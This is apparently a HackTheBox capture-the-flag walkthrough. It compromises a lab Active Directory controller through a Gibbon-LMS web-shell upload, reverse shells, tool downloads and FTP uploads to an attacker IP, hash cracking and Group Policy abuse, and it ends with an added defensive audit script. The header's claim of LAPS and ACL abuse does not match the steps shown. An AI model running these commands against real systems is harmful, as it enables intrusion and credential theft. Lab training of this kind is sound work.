AD / Medium / Windows
HTB — TheFrizz
Active Directory machine exploiting misconfigured LAPS and ACL abuse chain to escalate from low-privileged user to Domain Admin.
March 18, 2025HackTheBox
Tags: AD, LAPS, ACL Abuse, BloodHound
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-18 17:13 EDT
Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 17:16 (0:00:13 remaining)
Nmap scan report for 10.10.11.60
Host is up (0.092s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-19 04:16:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
55596/tcp open msrpc Microsoft Windows RPC
55600/tcp open msrpc Microsoft Windows RPC
55610/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (89%)
Aggressive OS guesses: Microsoft Windows Server 2022 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m39s
| smb2-time:
| date: 2025-03-19T04:16:59
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 195.15 ms 10.10.14.1
2 195.24 ms 10.10.11.60
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.27 seconds
80/tcp
sh
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
LFI Gibbon v25.0.0
- https://github.com/maddsec/CVE-2023-34598

Gibbon RCE Upload
- https://www.reddit.com/r/netsec/comments/17zjtmj/cve202345878_vulnerability_in_gibbon_edu_leads_to/?rdt=35877
sh
curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"
- powershell reverse shell using reverse shell generator
sh
http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=powershell+-... (encoded reverse-shell payload omitted)
rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.60] 50462
whoami
frizz\w.webservice
PS C:\xampp\htdocs\Gibbon-LMS>
88
sh
/opt/kerbrute/dist/kerbrute_linux_amd64 userenum -d frizz.htb --dc 10.10.11.60 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 03/18/25 - Ronnie Flathers @ropnop
2025/03/18 17:31:50 > Using KDC(s):
2025/03/18 17:31:50 > 10.10.11.60:88
2025/03/18 17:31:56 > [+] VALID USERNAME: administrator@frizz.htb
2025/03/18 17:32:27 > [+] VALID USERNAME: Administrator@frizz.htb
445/tcp open microsoft-ds?
sh
smbclient -N -L \\\\10.10.11.60
session setup failed: NT_STATUS_NOT_SUPPORTED
config.php
sh
PS C:\xampp\htdocs\Gibbon-LMS> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\xampp\htdocs\Gibbon-LMS> cat config.php
<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**
* Sets the database connection information.
* You can supply an optional $databasePort if your server requires one.
*/
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
creds
MrGibbonsDB:MisterGibbs!Parrot!?1
users
sh
PS C:\xampp\htdocs\Gibbon-LMS> net user
User accounts for \\FRIZZDC
-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice
The command completed successfully.
txt
a.perlstein
c.sandiego
g.frizzle
J.perlstein
l.awesome
p.terese
v.frizzle
Administrator
d.hudson
k.franklin
m.ramon
r.tennelli
w.li
c.ramon
f.frizzle
h.arm
M.SchoolBus
t.wright
w.Webservice
chisel
sh
Invoke-WebRequest http://10.10.14.10/chisel.exe -OutFile chisel.exe
sh
./chisel server --reverse --port 1234
./chisel.exe client 10.10.14.10:1234 R:3306:127.0.0.1:3306
sh
PS C:\xampp\htdocs\Gibbon-LMS> ./chisel.exe client 10.10.14.10:1234 R:3306:127.0.0.1:3306
mysql
sh
mysql -u MrGibbonsDB -p'MisterGibbs!Parrot!?1' -h 127.0.0.1
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 97
Server version: 10.4.32-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| gibbon |
| information_schema |
| test |
+--------------------+
3 rows in set (0.024 sec)
sh
MariaDB [test]> use gibbon
sh
MariaDB [gibbon]> show tables;
(191 table names omitted; only gibbonperson is used below)
191 rows in set (0.051 sec)
sh
MariaDB [gibbon]> select * from gibbonperson;
(output trimmed to the relevant columns of the single row returned)
+----------------+-----------+------------------------------------------------------------------+------------------------+---------------------+
| gibbonPersonID | username  | passwordStrong                                                   | passwordStrongSalt     | email               |
+----------------+-----------+------------------------------------------------------------------+------------------------+---------------------+
| 0000000001     | f.frizzle | 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 | /aACFhikmNopqrRTVz2489 | f.frizzle@frizz.htb |
+----------------+-----------+------------------------------------------------------------------+------------------------+---------------------+
hashcat
sh
hashcat -m 1420 -a 0 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489 /usr/share/wordlists/rockyou.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
creds
f.frizzle:Jenni_Luvs_Magic23
getTGT
sh
sudo ntpdate 10.10.11.60 & impacket-getTGT frizz.htb/f.frizzle:'Jenni_Luvs_Magic23' -dc-ip 10.10.11.60
[2] 63633
2025-03-20 01:01:07.067136 (-0400) +25204.355720 +/- 0.013230 10.10.11.60 s1 no-leap
CLOCK: time stepped by 25204.355720
[2] - done sudo ntpdate 10.10.11.60
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache
sh
export KRB5CCNAME=/home/sake/htb-labs/TheFrizz/f.frizzle.ccache
add this to /etc/krb5.conf
sh
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_kdc = false
[realms]
FRIZZ.HTB = {
kdc = 10.10.11.60
admin_server = 10.10.11.60
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
sh
ntpdate 10.10.11.60
ssh
sh
ssh f.frizzle@frizz.htb
sh
PS C:\Users\f.frizzle> whoami
frizz\f.frizzle
user.txt
sh
PS C:\Users\f.frizzle\Desktop> cat user.txt
d48608f2...
sh
PS C:\Users> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
v.frizzle
The command completed successfully.
sh
PS C:\Users\f.frizzle\Documents> Invoke-WebRequest http://10.10.14.10/SharpHound.exe -OutFile SharpHound.exe
sh
.\SharpHound.exe -c All --zipfilename frizz.htb
group policy
sh
PS C:\Users\f.frizzle\Documents> Get-DomainGPO | select displayname
displayname
-----------
Default Domain Policy
Default Domain Controllers Policy
sh
python3 -m pyftpdlib -p 21 -w
sh
(New-Object Net.WebClient).UploadFile('ftp://10.10.14.10/20250320134617_frizz.htb.zip', 'C:\Users\f.frizzle\Documents\20250320134617_frizz.htb.zip')
bloodhound
domain admins

hidden folder
sh
PS C:\> ls -Force | Where-Object { $_.Attributes -match "Hidden" }
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM $RECYCLE.BIN
d--h- 3/10/2025 3:31 PM $WinREAgent
d--hs 2/20/2025 2:51 PM Config.Msi
l--hs 10/29/2024 9:12 AM Documents and Settings -> C:\Users
d--h- 2/20/2025 2:50 PM ProgramData
d--hs 10/29/2024 9:12 AM Recovery
d--hs 10/29/2024 7:25 AM System Volume Information
-a-hs 10/29/2024 8:27 AM 12288 DumpStack.log.tmp
sh
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> copy '$RE2XMEG.7z' C:\Users\f.frizzle\Documents\recycle.7z
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> copy '$IE2XMEG.7z' C:\Users\f.frizzle\Documents\recycle2.7z
- transfer to own kali
sh
python3 -m pyftpdlib -p 21 -w
sh
(New-Object Net.WebClient).UploadFile('ftp://10.10.14.10/recycle.7z', 'C:\Users\f.frizzle\Documents\recycle.7z')
sh
(New-Object Net.WebClient).UploadFile('ftp://10.10.14.10/recycle2.7z', 'C:\Users\f.frizzle\Documents\recycle2.7z')
sh
7z x recycle.7z
sh
cat waptserver.ini
[options]
allow_unauthenticated_registration = True
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt
[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\log
creds
sh
echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d
!suBcig@MehTed!R
- potential users
cmd
PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 3/11/2025 3:37 PM Administrator
d---- 10/29/2024 7:27 AM f.frizzle
d---- 10/29/2024 7:31 AM M.SchoolBus
d-r-- 10/29/2024 7:13 AM Public
d---- 2/19/2025 1:35 PM v.frizzle
d---- 2/19/2025 1:35 PM w.Webservice
- using the impacket-getTGT method to test if the credential works
sh
sudo ntpdate 10.10.11.60 & impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@MehTed!R' -dc-ip 10.10.11.60
[3] 454915
2025-03-20 18:31:24.109874 (-0400) +25204.756353 +/- 0.009193 10.10.11.60 s1 no-leap
CLOCK: time stepped by 25204.756353
[3] done sudo ntpdate 10.10.11.60
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in M.SchoolBus.ccache
- using another user will fail
sh
sudo ntpdate 10.10.11.60 & impacket-getTGT frizz.htb/v.frizzle:'!suBcig@MehTed!R' -dc-ip 10.10.11.60
[3] 460039
2025-03-20 18:35:37.642330 (-0400) -0.001326 +/- 0.009005 10.10.11.60 s1 no-leap
[3] done sudo ntpdate 10.10.11.60
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
sh
export KRB5CCNAME=/home/sake/htb-labs/TheFrizz/M.SchoolBus.ccache
sh
ntpdate 10.10.11.60
sh
ssh M.SchoolBus@frizz.htb
sh
PS C:\Users\M.SchoolBus> whoami
frizz\m.schoolbus
PS C:\Users\M.SchoolBus> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
sh
PS C:\Users\M.SchoolBus> whoami /all
USER INFORMATION
----------------
User Name SID
================= ==============================================
frizz\m.schoolbus S-1-5-21-2386970044-1145388522-2932701813-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
frizz\Desktop Admins Group S-1-5-21-2386970044-1145388522-2932701813-1121 Mandatory group, Enabled by default, Enabled group
frizz\Group Policy Creator Owners Group S-1-5-21-2386970044-1145388522-2932701813-520 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
frizz\Denied RODC Password Replication Group Alias S-1-5-21-2386970044-1145388522-2932701813-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
sh
Invoke-WebRequest http://10.10.14.10/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe
sh
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "DEFAULT DOMAIN POLICY"
sh
Invoke-WebRequest http://10.10.14.10/PowerView.ps1 -OutFile PowerView.ps1
sh
Set-ExecutionPolicy Bypass -Scope Process
sh
Import-Module .\PowerView.ps1
sh
PS C:\Users\M.SchoolBus\Documents> Get-DomainGPO | select displayname
displayname
-----------
Default Domain Policy
Default Domain Controllers Policy
sh
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "Default Domain Policy"
sh
PS C:\Users\M.SchoolBus\Documents> New-GPO -Name "BackdoorPolicy"
DisplayName : BackdoorPolicy
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : 4213b0e0-c3dd-46f2-9c92-15855fee19ac
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 3/20/2025 4:06:55 PM
ModificationTime : 3/20/2025 4:06:55 PM
UserVersion :
ComputerVersion :
WmiFilter :
sh
New-GPLink -Name "BackdoorPolicy" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
GpoId : 5ee86fda-fbe8-4bd6-8347-9d939ff84492
DisplayName : BackdoorPolicy
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order : 2
sh
PS C:\Users\M.SchoolBus\Documents> Get-GPO -Name "BackdoorPolicy"
DisplayName : BackdoorPolicy
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : 5ee86fda-fbe8-4bd6-8347-9d939ff84492
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 3/20/2025 4:07:57 PM
ModificationTime : 3/20/2025 4:07:56 PM
UserVersion :
ComputerVersion :
WmiFilter :
sh
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "BackdoorPolicy"
sh
PS C:\Users\M.SchoolBus\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "BackdoorPolicy"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "BackdoorPolicy" is: {5EE86FDA-FBE8-4BD6-8347-9D939FF84492}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{5EE86FDA-FBE8-4BD6-8347-9D939FF84492}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
sh
gpupdate /force
sh
PS C:\Users\M.SchoolBus\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
M.SchoolBus
The command completed successfully.
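The step that actually granted local admin above was SharpGPOAbuse writing a Restricted Groups entry into the new GPO's GptTmpl.inf in SysVol. As an added defender-side example (not part of the original write-up, SharpGPOAbuse, or Gibbon), the following Python parses such a template and reports every principal it forces into BUILTIN\Administrators; the sample template text is constructed from the values this page shows (the M.SchoolBus SID), and the function names are mine.

```python
"""Audit a Group Policy security template (GptTmpl.inf) for Restricted Groups
entries that force extra members into the local Administrators group.

Constructed example for this write-up; not part of SharpGPOAbuse or Gibbon.
"""
import re

# BUILTIN\Administrators: well-known SID, and the name SecEdit templates may use instead.
ADMIN_GROUP_KEYS = {"S-1-5-32-544", "Administrators"}

# Constructed sample mirroring what SharpGPOAbuse --AddLocalAdmin writes to
# Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf inside the GPO's SysVol folder.
# The member SID is the one this write-up reports for M.SchoolBus.
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-2386970044-1145388522-2932701813-1106
"""

# Key format inside [Group Membership]: "<*SID or name>__Members" / "<*SID or name>__Memberof".
_KEY_RE = re.compile(r"\*?(.+?)__(Members|Memberof)")


def parse_group_membership(text):
    """Return {group: {"Members": [...], "Memberof": [...]}} for the [Group Membership] section.

    Leading '*' markers (SecEdit's way of flagging SIDs) are stripped from keys and values.
    """
    groups = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank line or comment
        if line.startswith("["):
            in_section = line.lower() == "[group membership]"
            continue
        if not in_section or "=" not in line:
            continue
        key, _, value = line.partition("=")
        match = _KEY_RE.fullmatch(key.strip())
        if not match:
            continue
        group, kind = match.group(1), match.group(2)
        members = [v.strip().lstrip("*") for v in value.split(",") if v.strip()]
        groups.setdefault(group, {"Members": [], "Memberof": []})[kind].extend(members)
    return groups


def find_admin_additions(text, allowed=()):
    """Return the sorted principals the template adds to BUILTIN\\Administrators.

    `allowed` holds SIDs/names expected there (e.g. the Domain Admins SID);
    anything else is a finding.
    """
    groups = parse_group_membership(text)
    added = []
    for key in ADMIN_GROUP_KEYS:
        added.extend(groups.get(key, {}).get("Members", []))
    return sorted(m for m in set(added) if m not in allowed)


if __name__ == "__main__":
    for principal in find_admin_additions(SAMPLE_GPTTMPL):
        print(f"[!] Restricted Groups adds {principal} to BUILTIN\\Administrators")
```

Run on a schedule against every GptTmpl.inf under the domain's SysVol Policies folder, and paired with an alert on new GPOs owned by non-administrative members of Group Policy Creator Owners, this flags the change before the next gpupdate cycle applies it.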
sh
sudo ntpdate 10.10.11.60 & impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@MehTed!R' -dc-ip 10.10.11.60
[1] 483551
2025-03-20 19:12:41.170807 (-0400) +25204.804481 +/- 0.009566 10.10.11.60 s1 no-leap
CLOCK: time stepped by 25204.804481
[1] + done sudo ntpdate 10.10.11.60
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in M.SchoolBus.ccache
sh
export KRB5CCNAME=/home/sake/htb-labs/TheFrizz/M.SchoolBus.ccache
sh
Invoke-WebRequest http://10.10.14.10/RunasCs.exe -OutFile RunasCs.exe
sh
.\RunasCs.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r 10.10.14.10:80
sh
rlwrap nc -lvnp 80
retrying local 0.0.0.0:80 : Address already in use
retrying local 0.0.0.0:80 : Address already in use
listening on [any] 80 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.60] 60728
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
whoami
frizz\m.schoolbus
root.txt
sh
PS C:\users\Administrator\Desktop> cat root.txt
cat root.txt
7d5d148d...